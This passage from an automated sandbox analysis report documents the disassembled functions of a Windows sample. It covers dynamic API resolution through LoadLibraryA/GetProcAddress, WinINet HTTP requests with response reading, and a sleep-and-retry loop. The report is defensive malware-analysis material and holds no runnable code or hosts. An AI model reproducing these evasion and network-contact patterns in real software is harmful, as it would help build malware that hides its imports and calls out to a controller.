                  • Opcode Fuzzy Hash: cd4b4e4322c9a217f1b070b3910d457515ed1538d9790e71df0fafaccb2f83af
                  • Instruction Fuzzy Hash: 62F04FB1944208ABC714DF98DD49FAEFBB8EB05751F10066AFA05A2680C77415058BA1
                  Function 002E1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: b69bd3d45ab25c778ffc277f9c84f478c9bf042c664a1394368afc67190319b6
                  • Instruction ID: c5f4ae9c91402c89bf47084959eff6e30c0100c76911368827bd8e08a5f37c75
                  • Opcode Fuzzy Hash: b69bd3d45ab25c778ffc277f9c84f478c9bf042c664a1394368afc67190319b6
                  • Instruction Fuzzy Hash: 37D05E7490030CDBCB10DFE0DC496EDBB78FB19311F040554D90562340EA305496CAAA
                  Function 002F9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 2f9c10-2f9c1a 634 2fa036-2fa0ca LoadLibraryA * 8 633->634 635 2f9c20-2fa031 GetProcAddress * 43 633->635 636 2fa0cc-2fa141 GetProcAddress * 5 634->636 637 2fa146-2fa14d 634->637 635->634 636->637 638 2fa216-2fa21d 637->638 639 2fa153-2fa211 GetProcAddress * 8 637->639 640 2fa21f-2fa293 GetProcAddress * 5 638->640 641 2fa298-2fa29f 638->641 639->638 640->641 642 2fa337-2fa33e 641->642 643 2fa2a5-2fa332 GetProcAddress * 6 641->643 644 2fa41f-2fa426 642->644 645 2fa344-2fa41a GetProcAddress * 9 642->645 643->642 646 2fa428-2fa49d GetProcAddress * 5 644->646 647 2fa4a2-2fa4a9 644->647 645->644 646->647 648 2fa4dc-2fa4e3 647->648 649 2fa4ab-2fa4d7 GetProcAddress * 2 647->649 650 2fa515-2fa51c 648->650 651 2fa4e5-2fa510 GetProcAddress * 2 648->651 649->648 652 2fa612-2fa619 650->652 653 2fa522-2fa60d GetProcAddress * 10 650->653 651->650 654 2fa67d-2fa684 652->654 655 2fa61b-2fa678 GetProcAddress * 4 652->655 653->652 656 2fa69e-2fa6a5 654->656 657 2fa686-2fa699 GetProcAddress 654->657 655->654 658 2fa708-2fa709 656->658 659 2fa6a7-2fa703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(75900000,013169A0), ref: 002F9C2D
                  • GetProcAddress.KERNEL32(75900000,01316700), ref: 002F9C45
                  • GetProcAddress.KERNEL32(75900000,01328F10), ref: 002F9C5E
                  • GetProcAddress.KERNEL32(75900000,01328FA0), ref: 002F9C76
                  • GetProcAddress.KERNEL32(75900000,0132D938), ref: 002F9C8E
                  • GetProcAddress.KERNEL32(75900000,0132DAD0), ref: 002F9CA7
                  • GetProcAddress.KERNEL32(75900000,0131B428), ref: 002F9CBF
                  • GetProcAddress.KERNEL32(75900000,0132D9C8), ref: 002F9CD7
                  • GetProcAddress.KERNEL32(75900000,0132D9F8), ref: 002F9CF0
                  • GetProcAddress.KERNEL32(75900000,0132D920), ref: 002F9D08
                  • GetProcAddress.KERNEL32(75900000,0132DAE8), ref: 002F9D20
                  • GetProcAddress.KERNEL32(75900000,01316840), ref: 002F9D39
                  • GetProcAddress.KERNEL32(75900000,013169E0), ref: 002F9D51
                  • GetProcAddress.KERNEL32(75900000,01316860), ref: 002F9D69
                  • GetProcAddress.KERNEL32(75900000,01316A00), ref: 002F9D82
                  • GetProcAddress.KERNEL32(75900000,0132DB18), ref: 002F9D9A
                  • GetProcAddress.KERNEL32(75900000,0132D950), ref: 002F9DB2
                  • GetProcAddress.KERNEL32(75900000,0131B450), ref: 002F9DCB
                  • GetProcAddress.KERNEL32(75900000,01316720), ref: 002F9DE3
                  • GetProcAddress.KERNEL32(75900000,0132D9B0), ref: 002F9DFB
                  • GetProcAddress.KERNEL32(75900000,0132DA58), ref: 002F9E14
                  • GetProcAddress.KERNEL32(75900000,0132D968), ref: 002F9E2C
                  • GetProcAddress.KERNEL32(75900000,0132D890), ref: 002F9E44
                  • GetProcAddress.KERNEL32(75900000,01316880), ref: 002F9E5D
                  • GetProcAddress.KERNEL32(75900000,0132D8C0), ref: 002F9E75
                  • GetProcAddress.KERNEL32(75900000,0132D980), ref: 002F9E8D
                  • GetProcAddress.KERNEL32(75900000,0132D8A8), ref: 002F9EA6
                  • GetProcAddress.KERNEL32(75900000,0132D908), ref: 002F9EBE
                  • GetProcAddress.KERNEL32(75900000,0132DB00), ref: 002F9ED6
                  • GetProcAddress.KERNEL32(75900000,0132D8D8), ref: 002F9EEF
                  • GetProcAddress.KERNEL32(75900000,0132D830), ref: 002F9F07
                  • GetProcAddress.KERNEL32(75900000,0132DA28), ref: 002F9F1F
                  • GetProcAddress.KERNEL32(75900000,0132D8F0), ref: 002F9F38
                  • GetProcAddress.KERNEL32(75900000,01329978), ref: 002F9F50
                  • GetProcAddress.KERNEL32(75900000,0132D848), ref: 002F9F68
                  • GetProcAddress.KERNEL32(75900000,0132D998), ref: 002F9F81
                  • GetProcAddress.KERNEL32(75900000,01316680), ref: 002F9F99
                  • GetProcAddress.KERNEL32(75900000,0132D860), ref: 002F9FB1
                  • GetProcAddress.KERNEL32(75900000,01316740), ref: 002F9FCA
                  • GetProcAddress.KERNEL32(75900000,0132D9E0), ref: 002F9FE2
                  • GetProcAddress.KERNEL32(75900000,0132D878), ref: 002F9FFA
                  • GetProcAddress.KERNEL32(75900000,013164C0), ref: 002FA013
                  • GetProcAddress.KERNEL32(75900000,01316660), ref: 002FA02B
                  • LoadLibraryA.KERNEL32(0132DA10,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA03D
                  • LoadLibraryA.KERNEL32(0132DA40,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA04E
                  • LoadLibraryA.KERNEL32(0132DA70,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA060
                  • LoadLibraryA.KERNEL32(0132DA88,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA072
                  • LoadLibraryA.KERNEL32(0132DAA0,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA083
                  • LoadLibraryA.KERNEL32(0132DAB8,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA095
                  • LoadLibraryA.KERNEL32(0132DE00,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA0A7
                  • LoadLibraryA.KERNEL32(0132DC80,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA0B8
                  • GetProcAddress.KERNEL32(75FD0000,013165C0), ref: 002FA0DA
                  • GetProcAddress.KERNEL32(75FD0000,0132DD58), ref: 002FA0F2
                  • GetProcAddress.KERNEL32(75FD0000,013288A0), ref: 002FA10A
                  • GetProcAddress.KERNEL32(75FD0000,0132DD40), ref: 002FA123
                  • GetProcAddress.KERNEL32(75FD0000,01316500), ref: 002FA13B
                  • GetProcAddress.KERNEL32(734B0000,0131B2C0), ref: 002FA160
                  • GetProcAddress.KERNEL32(734B0000,01316300), ref: 002FA179
                  • GetProcAddress.KERNEL32(734B0000,0131AED8), ref: 002FA191
                  • GetProcAddress.KERNEL32(734B0000,0132DDD0), ref: 002FA1A9
                  • GetProcAddress.KERNEL32(734B0000,0132DC98), ref: 002FA1C2
                  • GetProcAddress.KERNEL32(734B0000,01316380), ref: 002FA1DA
                  • GetProcAddress.KERNEL32(734B0000,013165E0), ref: 002FA1F2
                  • GetProcAddress.KERNEL32(734B0000,0132DBD8), ref: 002FA20B
                  • GetProcAddress.KERNEL32(763B0000,013162A0), ref: 002FA22C
                  • GetProcAddress.KERNEL32(763B0000,01316520), ref: 002FA244
                  • GetProcAddress.KERNEL32(763B0000,0132DB30), ref: 002FA25D
                  • GetProcAddress.KERNEL32(763B0000,0132DCC8), ref: 002FA275
                  • GetProcAddress.KERNEL32(763B0000,01316620), ref: 002FA28D
                  • GetProcAddress.KERNEL32(750F0000,0131B2E8), ref: 002FA2B3
                  • GetProcAddress.KERNEL32(750F0000,0131B298), ref: 002FA2CB
                  • GetProcAddress.KERNEL32(750F0000,0132DB78), ref: 002FA2E3
                  • GetProcAddress.KERNEL32(750F0000,01316540), ref: 002FA2FC
                  • GetProcAddress.KERNEL32(750F0000,01316560), ref: 002FA314
                  • GetProcAddress.KERNEL32(750F0000,0131B310), ref: 002FA32C
                  • GetProcAddress.KERNEL32(75A50000,0132DCE0), ref: 002FA352
                  • GetProcAddress.KERNEL32(75A50000,01316400), ref: 002FA36A
                  • GetProcAddress.KERNEL32(75A50000,01328930), ref: 002FA382
                  • GetProcAddress.KERNEL32(75A50000,0132DE18), ref: 002FA39B
                  • GetProcAddress.KERNEL32(75A50000,0132DC50), ref: 002FA3B3
                  • GetProcAddress.KERNEL32(75A50000,01316600), ref: 002FA3CB
                  • GetProcAddress.KERNEL32(75A50000,01316320), ref: 002FA3E4
                  • GetProcAddress.KERNEL32(75A50000,0132DB60), ref: 002FA3FC
                  • GetProcAddress.KERNEL32(75A50000,0132DCF8), ref: 002FA414
                  • GetProcAddress.KERNEL32(75070000,01316480), ref: 002FA436
                  • GetProcAddress.KERNEL32(75070000,0132DDE8), ref: 002FA44E
                  • GetProcAddress.KERNEL32(75070000,0132DCB0), ref: 002FA466
                  • GetProcAddress.KERNEL32(75070000,0132DB48), ref: 002FA47F
                  • GetProcAddress.KERNEL32(75070000,0132DB90), ref: 002FA497
                  • GetProcAddress.KERNEL32(74E50000,013162C0), ref: 002FA4B8
                  • GetProcAddress.KERNEL32(74E50000,01316360), ref: 002FA4D1
                  • GetProcAddress.KERNEL32(75320000,013162E0), ref: 002FA4F2
                  • GetProcAddress.KERNEL32(75320000,0132DD28), ref: 002FA50A
                  • GetProcAddress.KERNEL32(6F060000,01316640), ref: 002FA530
                  • GetProcAddress.KERNEL32(6F060000,013164A0), ref: 002FA548
                  • GetProcAddress.KERNEL32(6F060000,01316580), ref: 002FA560
                  • GetProcAddress.KERNEL32(6F060000,0132DBF0), ref: 002FA579
                  • GetProcAddress.KERNEL32(6F060000,01316280), ref: 002FA591
                  • GetProcAddress.KERNEL32(6F060000,013165A0), ref: 002FA5A9
                  • GetProcAddress.KERNEL32(6F060000,01316340), ref: 002FA5C2
                  • GetProcAddress.KERNEL32(6F060000,013163E0), ref: 002FA5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 002FA5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 002FA607
                  • GetProcAddress.KERNEL32(74E00000,0132DBA8), ref: 002FA629
                  • GetProcAddress.KERNEL32(74E00000,01328990), ref: 002FA641
                  • GetProcAddress.KERNEL32(74E00000,0132DBC0), ref: 002FA659
                  • GetProcAddress.KERNEL32(74E00000,0132DC08), ref: 002FA672
                  • GetProcAddress.KERNEL32(74DF0000,013164E0), ref: 002FA693
                  • GetProcAddress.KERNEL32(6F9C0000,0132DC20), ref: 002FA6B4
                  • GetProcAddress.KERNEL32(6F9C0000,01316420), ref: 002FA6CD
                  • GetProcAddress.KERNEL32(6F9C0000,0132DDB8), ref: 002FA6E5
                  • GetProcAddress.KERNEL32(6F9C0000,0132DD10), ref: 002FA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 28aa634db3a45087b6dac17e01ba8a214047dafbe709513bbfa272e9b6833160
                  • Instruction ID: 051c6b9c27a69a5b160e6faa3404d68b5db3a5412d8aa16114d765faf613aa3b
                  • Opcode Fuzzy Hash: 28aa634db3a45087b6dac17e01ba8a214047dafbe709513bbfa272e9b6833160
                  • Instruction Fuzzy Hash: 416261B5500200AFC768DFA8EE8895637F9FF6E701708452AE605C3225D739A44BFF56
                  Function 002E6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 2e6280-2e630b call 2fa7a0 call 2e47b0 call 2fa740 InternetOpenA StrCmpCA 1040 2e630d 1033->1040 1041 2e6314-2e6318 1033->1041 1040->1041 1042 2e631e-2e6342 InternetConnectA 1041->1042 1043 2e6509-2e6525 call 2fa7a0 call 2fa800 * 2 1041->1043 1044 2e64ff-2e6503 InternetCloseHandle 1042->1044 1045 2e6348-2e634c 1042->1045 1061 2e6528-2e652d 1043->1061 1044->1043 1048 2e634e-2e6358 1045->1048 1049 2e635a 1045->1049 1051 2e6364-2e6392 HttpOpenRequestA 1048->1051 1049->1051 1053 2e6398-2e639c 1051->1053 1054 2e64f5-2e64f9 InternetCloseHandle 1051->1054 1056 2e639e-2e63bf InternetSetOptionA 1053->1056 1057 2e63c5-2e6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1044 1056->1057 1059 2e642c-2e644b call 2f8940 1057->1059 1060 2e6407-2e6427 call 2fa740 call 2fa800 * 2 1057->1060 1067 2e644d-2e6454 1059->1067 1068 2e64c9-2e64e9 call 2fa740 call 2fa800 * 2 1059->1068 1060->1061 1071 2e6456-2e6480 InternetReadFile 1067->1071 1072 2e64c7-2e64ef InternetCloseHandle 1067->1072 1068->1061 1076 2e648b 1071->1076 1077 2e6482-2e6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 2e648d-2e64c5 call 2fa9b0 call 2fa8a0 call 2fa800 1077->1080 1080->1071
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • InternetOpenA.WININET(00300DFE,00000001,00000000,00000000,00000000), ref: 002E62E1
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002E63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002E63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002E646D
                  • InternetCloseHandle.WININET(00000000), ref: 002E64EF
                  • InternetCloseHandle.WININET(00000000), ref: 002E64F9
                  • InternetCloseHandle.WININET(00000000), ref: 002E6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 564e20367718d11809847eb1df2d0181690548cccfbf5709dda1e486d9143214
                  • Instruction ID: b02dcdffbd2ae5f3ce5a32747d5cacd1e51830da52cce8343df5f51004545b26
                  • Opcode Fuzzy Hash: 564e20367718d11809847eb1df2d0181690548cccfbf5709dda1e486d9143214
                  • Instruction Fuzzy Hash: 37716E71A50248ABDB24DF90CC49BEEB774BF14740F5081A8F20A6B1D0DBB46A89CF51
                  Function 002F5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 2f5510-2f5577 call 2f5ad0 call 2fa820 * 3 call 2fa740 * 4 1106 2f557c-2f5583 1090->1106 1107 2f55d7-2f564c call 2fa740 * 2 call 2e1590 call 2f52c0 call 2fa8a0 call 2fa800 call 2faad0 StrCmpCA 1106->1107 1108 2f5585-2f55b6 call 2fa820 call 2fa7a0 call 2e1590 call 2f51f0 1106->1108 1134 2f5693-2f56a9 call 2faad0 StrCmpCA 1107->1134 1138 2f564e-2f568e call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1107->1138 1124 2f55bb-2f55d2 call 2fa8a0 call 2fa800 1108->1124 1124->1134 1139 2f56af-2f56b6 1134->1139 1140 2f57dc-2f5844 call 2fa8a0 call 2fa820 * 2 call 2e1670 call 2fa800 * 4 call 2f6560 call 2e1550 1134->1140 1138->1134 1143 2f56bc-2f56c3 1139->1143 1144 2f57da-2f585f call 2faad0 StrCmpCA 1139->1144 1270 2f5ac3-2f5ac6 1140->1270 1148 2f571e-2f5793 call 2fa740 * 2 call 2e1590 call 2f52c0 call 2fa8a0 call 2fa800 call 2faad0 StrCmpCA 1143->1148 1149 2f56c5-2f5719 call 2fa820 call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1143->1149 1163 2f5865-2f586c 1144->1163 1164 2f5991-2f59f9 call 2fa8a0 call 2fa820 * 2 call 2e1670 call 2fa800 * 4 call 2f6560 call 2e1550 1144->1164 1148->1144 1249 2f5795-2f57d5 call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1148->1249 1149->1144 1170 2f598f-2f5a14 call 2faad0 StrCmpCA 1163->1170 1171 2f5872-2f5879 1163->1171 1164->1270 1200 2f5a28-2f5a91 call 2fa8a0 call 2fa820 * 2 call 2e1670 call 2fa800 * 4 call 2f6560 call 2e1550 1170->1200 1201 2f5a16-2f5a21 Sleep 1170->1201 1179 2f587b-2f58ce call 2fa820 call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1171->1179 1180 2f58d3-2f5948 call 2fa740 * 2 call 2e1590 call 2f52c0 call 2fa8a0 call 2fa800 call 2faad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 2f594a-2f598a call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1180->1275 1200->1270 1201->1106 1249->1144 1275->1170
                  APIs
                    • Part of subcall function 002FA820: lstrlen.KERNEL32(002E4F05,?,?,002E4F05,00300DDE), ref: 002FA82B
                    • Part of subcall function 002FA820: lstrcpy.KERNEL32(00300DDE,00000000), ref: 002FA885
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5857
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5228
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5318
                    • Part of subcall function 002F52C0: lstrlen.KERNEL32(00000000), ref: 002F532F
                    • Part of subcall function 002F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 002F5364
                    • Part of subcall function 002F52C0: lstrlen.KERNEL32(00000000), ref: 002F5383
                    • Part of subcall function 002F52C0: lstrlen.KERNEL32(00000000), ref: 002F53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 002F5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 1e6aa38756018142567ba505f1a2b9f2aba1e791e1ebb6801fdccadd200bebf0
                  • Instruction ID: e74dee8c3965b43f4f5efd56f671ce58bc7b9852e27154ad8f861851e835e7f0
                  • Opcode Fuzzy Hash: 1e6aa38756018142567ba505f1a2b9f2aba1e791e1ebb6801fdccadd200bebf0
                  • Instruction Fuzzy Hash: CCE1EEB192010C9BCB14FBA0DD56EFDB378AF54380F508538A60B56195EF746A2ECF92
                  Function 002F17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 2f17a0-2f17cd call 2faad0 StrCmpCA 1304 2f17cf-2f17d1 ExitProcess 1301->1304 1305 2f17d7-2f17f1 call 2faad0 1301->1305 1309 2f17f4-2f17f8 1305->1309 1310 2f17fe-2f1811 1309->1310 1311 2f19c2-2f19cd call 2fa800 1309->1311 1313 2f199e-2f19bd 1310->1313 1314 2f1817-2f181a 1310->1314 1313->1309 1316 2f18cf-2f18e0 StrCmpCA 1314->1316 1317 2f198f-2f1999 call 2fa820 1314->1317 1318 2f18ad-2f18be StrCmpCA 1314->1318 1319 2f1849-2f1858 call 2fa820 1314->1319 1320 2f1821-2f1830 call 2fa820 1314->1320 1321 2f187f-2f1890 StrCmpCA 1314->1321 1322 2f185d-2f186e StrCmpCA 1314->1322 1323 2f1835-2f1844 call 2fa820 1314->1323 1324 2f1913-2f1924 StrCmpCA 1314->1324 1325 2f1932-2f1943 StrCmpCA 1314->1325 1326 2f18f1-2f1902 StrCmpCA 1314->1326 1327 2f1951-2f1962 StrCmpCA 1314->1327 1328 2f1970-2f1981 StrCmpCA 1314->1328 1341 2f18ec 1316->1341 1342 2f18e2-2f18e5 1316->1342 1317->1313 1339 2f18ca 1318->1339 1340 2f18c0-2f18c3 1318->1340 1319->1313 1320->1313 1337 2f189e-2f18a1 1321->1337 1338 2f1892-2f189c 1321->1338 1335 2f187a 1322->1335 1336 2f1870-2f1873 1322->1336 1323->1313 1345 2f1926-2f1929 1324->1345 1346 2f1930 1324->1346 1347 2f194f 1325->1347 1348 2f1945-2f1948 1325->1348 1343 2f190e 1326->1343 1344 2f1904-2f1907 1326->1344 1349 2f196e 1327->1349 1350 2f1964-2f1967 1327->1350 1329 2f198d 1328->1329 1330 2f1983-2f1986 1328->1330 1329->1313 1330->1329 1335->1313 1336->1335 1355 2f18a8 